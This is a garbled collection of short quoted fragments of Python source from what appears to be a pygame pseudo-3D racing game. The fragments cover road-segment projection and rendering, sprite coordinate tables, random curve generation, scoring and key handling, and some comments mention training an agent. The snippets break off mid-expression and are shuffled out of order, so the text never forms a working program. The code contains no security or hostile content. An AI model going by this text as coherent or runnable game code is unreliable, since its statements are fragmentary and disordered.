-self.lane_w - self.player_x xcr3", "#engi = math.pi / 2.0 / self.seg_draw_n engi = math.pi", "0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None", "= rad - self.road_w / 2 yc = self.camera_h print", "go to a new road TODO: * hill road *", "= obj.rect.left sprt_w = obj.rect.width car_x = self.player_x car_w =", "yc, d, zc): if zc == 0.0: #yp = float('inf')", "dx_curve xcr4 = xcr4 - x_curve - dx_curve x_curve =", "255, 'y': 1097, 'w': 232, 'h': 152 }, 'BILLBOARD03': {", "self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left =", "FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' # <2> if obj:", "events else: return self.check_key(events) def key_to_di(self, k): if k ==", "if trees.rect.left - trees.rect.width > 0: trees.rect.left -= trees.rect.width *", "360 }, 'DEAD_TREE1': { 'x': 5, 'y': 555, 'w': 135,", "self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left =", "'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'],", "slow down if self.player_x < -self.road_w / 2 or \\", "'y': 985, 'w': 1280, 'h': 480 }, } IMG_POS_SPRITES =", "> 0: self.score -= 1 #self.score -= 1 #if self.score", "= time.time() self.tm_end = self.tm_start else: self.tm_end = time.time() self.tm_last_once", "if event.type == self.pglc.KEYUP: k = event.key if k ==", "* 0.1 #theta_i = math.pi /180.0 * 0.5 theta_i =", "self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100))", "tht_d = math.asin(a) return tht_d def get_segs_pnts(self, segs, rad): pnts", "= zw2 - self.camera_z - self.position curve_d = 500 #x#xc1", "self.c = c self.h = h self.draw_on() def draw_on(self, *args,", "0 in e_keys_up: if self.player_go != 2: self.player_go = 0", "= 0.0 self.yw = 0.0 self.zw = 0.0 self.xc =", "= self.seg_lasy_y() end_y = start_y + (int(yw) * self.seg_len) total", "\"\"\"straight\"\"\" xc1 = self.road_w / 2 - self.player_x xc2 =", "= obj ##self.disp_add(obj) # NOTE: render out here self.rd_sprt_objs[obj_k] =", "(rad - xx1) - self.player_x xc2 = (rad - xx2)", "(i + seg_n) % seg_n return i def rd_get_segs(self, whole=False):", "+ increment while (result >= mx): result -= mx while", "'#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE':", "= self.speed * p_curve * self.centrifugal #p_dt = 40 #p_dt", "*args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos,", "ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i = math.pi", "dx2 #+ dx1 #''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "road map * TAB : replay this road * RETURN", "#xc4 = -self.road_w / 2 - self.player_x # <3> #engi", "self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args, **kwargs): #return events r_events =", "(b_curve * b_percent) x_curve = 0 # <1> #for i,", "1 in e_keys_up: if self.player_di != 3: self.player_di = 0", "or k == self.pglc.K_v or k == self.pglc.K_n: return 2", "= FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610", "== self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:", "'#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE = '#00EEEE'", "- self.lane_w xcl4 = xc4 + self.lane_w xcr1 = xcr1", "= 0.0 self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h", "''' zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 = zw1", "hold, leave, curve, yw) def rd_seg_init_rand_2(self, n=50): for i in", "for spr in seg['sprites']: spr_n = {} for sk, sv", "2 or \\ self.player_x > self.road_w / 2: if self.score", "- self.camera_z - self.position curve_d = 500 #x#xc1 = self.road_w", "self.zw = 0.0 self.xc = 0.0 self.yc = 0.0 self.zc", "'x': 1365, 'y': 644, 'w': 100, 'h': 78 }, 'CAR03':", "5, 'w': 200, 'h': 315 }, 'BILLBOARD01': { 'x': 625,", "**kwargs): super(FPSptFog, self).__init__(size) self.c = c self.h = h self.draw_on()", "#self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves()", "def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for i in range(n):", "0 # <1> #for i, seg in enumerate(self.segments): # <2>", "xc1 - self.lane_w #xcl2 = xc2 + self.lane_w #xcl3 =", "always move the cloud #sky.rect.left -= self.sky_speed if sky.rect.left +", "= xcr1 - x_curve xcr2 = xcr2 - x_curve xcr3", "= [self.xy_to_cntr(p[0], p[1]) for p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE)", "% seg_n #print si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len", "190 }, 'BOULDER2': { 'x': 621, 'y': 897, 'w': 298,", "= self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 =", "x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale) info['obj'] = obj ##self.disp_add(obj)", "ys2, xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1 =", "self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on()", "0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4,", "= car_w / 2 + sprt_w / 2 #if (car_x", "rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt)", "hill.rect.left - hill.rect.width > 0: hill.rect.left -= hill.rect.width * 2", "self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left", "(i+2)*self.seg_len zc1 = zw1 - self.camera_z - (self.position % self.seg_len)", "x_dt = x_rnd * seg_scale x_pos = [xsr1, xsr2, (xsr1", "self.add_road(enter, hold, leave, curve, yw) def rd_start_seg_init(self, n=3): seg_n =", "'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,},", "= math.acos(a) tht_d = math.asin(a) # TODO: tht += tht_d", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for i in range(n): p", "'w': 195, 'h': 140 }, 'SEMI': { 'x': 1365, 'y':", "trees.rect.left += trees.rect.width * 2 if trees.rect.left - trees.rect.width >", "#''' ''' # for test if i < 10: print", "= 0.0 self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05# self.hill_speed =", "def xp_to_xs(self, xp, w): #xs = w / 2.0 +", "i in range(n): p = random.random() #print p rl =", "# for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0)", "1)) xc1 = (rad - xx1) - self.player_x xc2 =", "keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not segs_file: segs_file", "hill.rect.width < 0: hill.rect.left += hill.rect.width * 2 if hill.rect.left", "88, 'h': 55 }, 'CAR02': { 'x': 1383, 'y': 825,", "+= int(self.tree_speed * p_dt) if trees.rect.left + trees.rect.width < 0:", "== self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event)", "''' # <2> if obj: self.disp_del(obj) # NOTE: objs will", "- (self.position % self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2", "ys4 = ys3 ''' # for test if i <", "- yw1 yc2 = yc - yw2 #print yw1, yw2", "xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None,", "if 1 in e_keys_dn: self.player_di = 1 elif 3 in", "-= self.speed_dt_na # if on the grass, slow down if", "rad = self.road_w * 4#2 rad1 = rad + self.road_w", "= FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left = 602", "= 100 self.disp_add(self.lb1) ''' def handle_event(self, events, *args, **kwargs): return", "50, 'LONG': 100 }, # num segments 'CURVE': {'NONE': 0,", "}, 'CAR04': { 'x': 1383, 'y': 894, 'w': 80, 'h':", "= self.xc_to_xp(xc2, self.d, zc1) xs2 = self.xp_to_xs(xp2, self.w) xp3 =", "time from starfish import pygm from starfish import consts from", "if trees.rect.left + trees.rect.width < 0: trees.rect.left += trees.rect.width *", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1", "elif k == self.pglc.K_k: return 1 elif k == self.pglc.K_SPACE", "zc == 0.0: #xp = float('inf') #xp = 2 **", "= 0 # 0:^ 1:> 2:v 3:< self.player_go = 0", "segbi = self.get_seg_base_i() #print 'segbi', segbi, ' / ', seg_n", "a + (b - a) * ((-math.cos(percent * math.pi)/2) +", "k, sprt in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k]", "' / ', seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi", "curve, rad): a = float(curve) / rad #a *= 10.0", "None def key_to_di_b(self, k): if k == self.pglc.K_f or k", "= FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1,", "dx_curve xcl1 = xc1 - self.lane_w xcl2 = xc2 +", "200#100#240#50# #a = 60 #pnts = [[x1, y1], [x2, y2],", "80, 'h': 41 } } FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK =", "pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw, winh, *args, **kwargs):", "for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n", "self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache self.rd_sprt_cache = []", "len(self.segments) if seg_n == 0: return 0.0 else: return self.segments[seg_n", "a > 1.0: a = 1.0 #tht_d = math.acos(a) tht_d", "seg_n = len(self.segments) if seg_n == 0: return #self.segments[0]['color'] =", "* 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if", "-= self.track_len # for check score self.last_seg_i = 0 self.game_over", "245, 'y': 1262, 'w': 215, 'h': 220 }, 'STUMP': {", "self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2,", "= 116 - y + 240 - obj.rect.height obj.rect.left =", "random.randint(10, 40) curve = rl * random.random() * 8.0 yw", "282, 'h': 295 }, 'BILLBOARD04': { 'x': 1205, 'y': 310,", "in e_keys_dn: self.player_go = 1 elif 2 in e_keys_dn: self.player_go", "0.0 self.tm_end = 0.0 self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05#", "mx)) def util_accelerate(self, v, accel, dt): return v + (accel", "+ (int(yw) * self.seg_len) total = enter + hold +", "'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w': 80, 'h': 41", "2 + x, self.size[1] / 2 - y] def cv_to_engl(self,", "= {} self.rd_sprt_cache = [] # for sprites render order", "for sky in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed *", "#x_sprt = (xs1 + xs2) / 2.0 #y_sprt = (ys1", "1 #self.score -= 1 #if self.score < 0: # self.score", "/ 2: self.speed -= 10 if self.speed < 0.0: self.speed", "#self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30)", "'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w':", "pnts) except Exception as e: #print '-' * 60 pass", "+ leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y,", "}, 'BUSH1': { 'x': 5, 'y': 1097, 'w': 240, 'h':", "self.road_w / 2: self.speed -= 10 if self.speed < 0.0:", "self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top =", "= segs self.track_len = len(self.segments) * self.seg_len except Exception as", "265 }, 'TREE1': { 'x': 625, 'y': 5, 'w': 360,", "* 2 for trees in self.bg_trees: trees.rect.left += int(self.tree_speed *", "#self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340", "rl = random.choice([1, -1]) if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "985, 'w': 1280, 'h': 480 }, } IMG_POS_SPRITES = {", "n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for", "0.0 self.yw = 0.0 self.zw = 0.0 self.xc = 0.0", "155 }, 'CACTUS': { 'x': 929, 'y': 897, 'w': 235,", "self.game_score = -1.0 def check_score(self): # make sure we check", "TODO: tht += tht_d rad_m = 10.0#50.0# x += rad_m", "0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items():", "1 elif 3 in e_keys_dn: self.player_di = 3 if 0", "= [] for seg in segs: if not seg['sprites']: segs_c.append(seg)", "= 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt =", "= self.camera_h print '=' * 80 print 'self.position', self.position #", "self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4,", "bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left", "if obj: self.disp_del(obj) # NOTE: objs will be deleted at", "in self.bg_sky: sky.rect.left -= 1#self.sky_speed if sky.rect.left + sky.rect.width <", "70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def", "{'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly':", "* 0.5 theta_i = math.pi /180.0 * 0.9 #theta_i =", "{ 'x': 5, 'y': 555, 'w': 135, 'h': 332 },", "segs_file: segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt' segs_file =", "check_score(self): # make sure we check score once for a", "title, winw, winh, *args, **kwargs): super(GMFlatpath, self).__init__(title, winw, winh) bk_im", "+ car_w / 2) #print '-' * 40 w_half =", "= 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear()", "{ 'x': 230, 'y': 280, 'w': 320, 'h': 220 },", "'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt", "utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args, **kwargs): #return events", "555, 'w': 328, 'h': 282 }, 'BOULDER3': { 'x': 230,", "45 }, 'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w': 80,", "= random.random() #print p rl = random.choice([1, -1]) enter =", "seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z'] zw2 =", "/ 2), sprt_at, (car_x + car_w / 2) #print '-'", "w_half = car_w / 2 + sprt_w / 2 #if", "/ 2 - y] def cv_to_engl(self, curve, rad): a =", "1.0 #tht_d = math.acos(a) tht_d = math.asin(a) return tht_d def", "y]) class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__()", "num, 0, height) self.add_road(num, num, num, 0, 0) self.add_road(num, num,", "/ 2.0 * xp xs = w / 2.0 +", "if self.player_di == 3: # < self.player_x -= 9 if", "self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0", "640, 480) sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt') sf.mainloop()", "230, 'h': 220 }, 'BILLBOARD02': { 'x': 245, 'y': 1262,", "x2, y2, x3, y3, x4, y4, color): #d = 200#100#240#50#", "= { 'HILLS': { 'x': 5, 'y': 5, 'w': 1280,", "= xc1 - x_curve xc2 = xc2 - x_curve xc3", "{ 'x': 1385, 'y': 1018, 'w': 80, 'h': 45 },", "sprt.get('score') if not scr: # None or 0 return obj", "xx2 = rad2 * math.cos(engi * i) xx3 = rad1", "dx_curve = dx_curve + seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d,", "#print pnts if len(pnts) <= 1: return #if len(pnts) >", "- curve_d * i # <3> xx1 = rad1 *", "self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog", "winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk =", "self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if 0 in e_keys_dn:", "self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn =", "for i, info in enumerate(sprts): sprt = info['name'] obj_k =", "y]) for seg in segs: curve = seg.get('curve', 0.0) if", "self.d, zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d,", "segbi = self.get_seg_base_i() print 'segbi', segbi # TODO: do at", "'x': 995, 'y': 531, 'w': 80, 'h': 41 } }", "not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is not None: try:", "sv else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def", "#print p rl = random.choice([1, -1]) if p < 0.35:", "- self.player_x yc = self.camera_h #print '=' * 80 #print", "xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i % 2 ==", "z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the", "* self.seg_len def seg_lasy_y(self): seg_n = len(self.segments) if seg_n ==", "= '#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE =", "x_i = sprt.get('x_i') if x_i is None: return scr =", "sprts = self.base_seg['sprites'] if not sprts: return # NOTE: we", "seg_n = len(self.segments) if seg_n == 0: return 0.0 else:", "{'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd':", "/ 2), self.size[0] / 2, 0) class SptTmpi(pygm.SptImg): def __init__(self,", "events, *args, **kwargs): #print '>>> ', events if not self.flag_check_event:", "'w': 328, 'h': 282 }, 'BOULDER3': { 'x': 230, 'y':", "dt): return v + (accel * dt) def util_increase(self, start,", "+ 1) * self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {}, 'screen': {}},", "= 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max =", "(n + 1) * self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {}, 'screen':", "tht_d = self.cv_to_engl(cv_l, rad) #tht += tht_d tht -= tht_d", "30) segnrand = random.randint(2, 6) # for a3c train self.rd_seg_init_rand(segnrand)", "* i) xx3 = rad1 * math.cos(engi * (i +", "should use the segment just under the car #sprts =", "xx2) - self.player_x xc3 = (rad - xx3) - self.player_x", "'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_LEFT': { 'x':", "{ 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score':", "= 200#100#240#50# #a = 60 #pnts = [[x1, y1], [x2,", "random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for", "self.pygm.draw.polygon(self.surf, c, pnts) except Exception as e: #print '-' *", "+= random.randint(2, 10) if self.position > self.track_len: self.position -= self.track_len", "def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def", "= self.size[1] if not keep_segs: self.segments = [] self.rd_sprt_objs =", "sprts[0] x_i = sprt.get('x_i') if x_i is None: return scr", "pos = self.position i = int(pos / self.seg_len) #x#i =", "k == self.pglc.K_n: return 2 elif k == self.pglc.K_d: return", "not scr: # None or 0 return obj = sprt.get('obj')", "self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def", "2 - y] def cv_to_engl(self, curve, rad): a = float(curve)", "<2>', scale pass x_i_saved = info.get('x_i') #if not x_i_saved: #", "#xc3 = self.road_w / 2 - self.player_x - curve_d *", "self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts: return # NOTE:", "= 0 if 1 in e_keys_up: if self.player_di != 3:", "}, 'TREES': { 'x': 5, 'y': 985, 'w': 1280, 'h':", "2: draw a circle\"\"\" #theta_i = math.pi /180.0 * 0.1", "super(GMFlatpath, self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk =", "= zw2 - self.camera_z - (self.position % self.seg_len) ''' #x#", "0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y])", "}, 'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h':", "#x#xc1 = self.road_w / 2 - self.player_x - curve_d *", "555, 'w': 135, 'h': 332 }, 'BILLBOARD09': { 'x': 150,", "if this seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd", "k == self.pglc.K_f or k == self.pglc.K_j: return 0 elif", "a3c train self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10)", "int(self.tree_speed * p_dt) if trees.rect.left + trees.rect.width < 0: trees.rect.left", "FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg", "self.player_di = 1 elif self.player_di == 1: self.player_x += 19", "super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left", "ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i", "= math.pi /180.0 * 0.9 #theta_i = 0.0 xc1 =", "0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False,", "}, 'BOULDER2': { 'x': 621, 'y': 897, 'w': 298, 'h':", "= -self.road_w / 2 - self.player_x - curve_d * i", "info['x_i'] = x_i # x_i_saved = x_i obj.rect.top = 116", "-self.road_w / 2 - self.player_x xc3 = self.road_w / 2", "500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n = 300#200", "result = start + increment while (result >= mx): result", "rd_get_segs(self, whole=False): if whole: segs = self.segments else: segs =", "= 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg =", "xy_to_cntr(self, x, y): return [self.size[0] / 2 + x, self.size[1]", "self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left =", "# def geo_prjc_scale(self, d, zc): if zc == 0.0: return", "- self.camera_z) #zc2 = self.position - (zw2 - self.camera_z) xp1", "'looped': 0, } self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len #self.track_len", "/ 2 rad2 = rad - self.road_w / 2 yc", "5 + 20 elif self.player_di == 3: #self.player_x -= self.player_x_dt", "road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__)", "ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, #", "'w': 100, 'h': 78 }, 'CAR03': { 'x': 1383, 'y':", "segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc)", "seg_i = self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i = seg_i", "segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x,", "', seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi + 2)", "xsl3 = self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4", "rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold =", "or \\ self.player_x > self.road_w / 2: self.speed -= 10", "self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2,", "# always move the cloud #sky.rect.left -= self.sky_speed if sky.rect.left", "['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs':", "490, 'w': 122, 'h': 144 }, 'TRUCK': { 'x': 1365,", "#'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},", "self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top =", "road sprites # TODO: check if this seg is looped", "y3-d], [x4, y4-d], [x1, y1-d]] #pnts = [[x1, y1+a], [x2,", "4, 'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM':", "##self.disp_add(self.car) # car disp add after road #self.road = FPSptRoad((640,", "self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self):", "}, 'TREE2': { 'x': 1205, 'y': 5, 'w': 282, 'h':", "= 2 ** 64 yp = yc else: yp =", "* 2 if trees.rect.left - trees.rect.width > 0: trees.rect.left -=", "+= tht_d rad_m = 10.0#50.0# x += rad_m * math.cos(tht)", "xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2,", "def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def", "- self.player_x xcr4 = -self.lane_w - self.player_x yc = self.camera_h", "#### geometry #### # def geo_prjc_scale(self, d, zc): if zc", "80, 'h': 41 }, 'PLAYER_RIGHT': { 'x': 995, 'y': 531,", "i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "def util_curve_percent_remaining(self, n, total): return (n % total) / total", "/ 2 or \\ self.player_x > self.road_w / 2: self.speed", "height/2.0) self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self, segs=None): if", "ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116", "self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if 1: #if i", "self.player_x - curve_d * i # <3> xx1 = rad1", "if sk not in ['obj']: spr_n[sk] = sv else: spr_n[sk]", "5, 'y': 5, 'w': 1280, 'h': 480 }, 'SKY': {", "c, pnts) except Exception as e: #print '-' * 60", "= self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max", "for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1, y1,", "return i def rd_get_segs(self, whole=False): if whole: segs = self.segments", "def update_world(self): if self.player_go == 1: self.speed += self.speed_dt_up elif", "- 1]['p2']['world'].get('y', 0.0) def 